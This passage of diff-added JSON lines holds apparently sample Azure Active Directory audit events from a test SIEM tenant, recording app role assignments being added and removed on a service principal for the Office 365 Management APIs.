{"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": 
"env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", 
"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", 
"Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372061"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "02868191-019a-453a-a3a9-a21f44898778"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": 
"asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": 
"18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, 
{"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "115f72b6-e8e6-4710-98e9-63ccd20bf2ec"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:34:47", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "d37460cd-3d19-4ae9-9515-015f27036e74"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T15:34:47.4999796Z"}, {"Name": "env_epoch", "Value": "FYE60"}, {"Name": "env_seqNum", "Value": "51372052"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 